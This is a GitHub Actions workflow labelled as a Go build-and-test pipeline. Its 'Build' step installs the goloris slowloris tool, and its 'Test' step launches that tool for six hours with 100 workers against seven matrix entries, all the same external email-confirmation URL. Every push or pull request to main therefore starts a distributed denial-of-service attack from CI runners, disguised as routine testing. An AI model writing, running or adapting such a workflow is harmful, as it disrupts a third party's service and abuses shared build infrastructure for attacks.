name: Go

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:
    runs-on: ubuntu-latest
    strategy:
     matrix: 
      site: [ "https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t", "https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t","https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t","https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t","https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t","https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t","https://lk.digiu.ai/auth/confirm-email?user=MQ==&hash=88P6iHAjmg3aB4pem34SNt44E993bJ-t"]
    steps:
    - uses: actions/checkout@v2

    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: 1.17

    - name: Build
      run: go get -u github.com/valyala/goloris

    - name: Test
      run: goloris -victimUrl "${{ matrix.site }}" -dialWorkersCount 100 -testDuration 6h -rampUpInterval 100ms
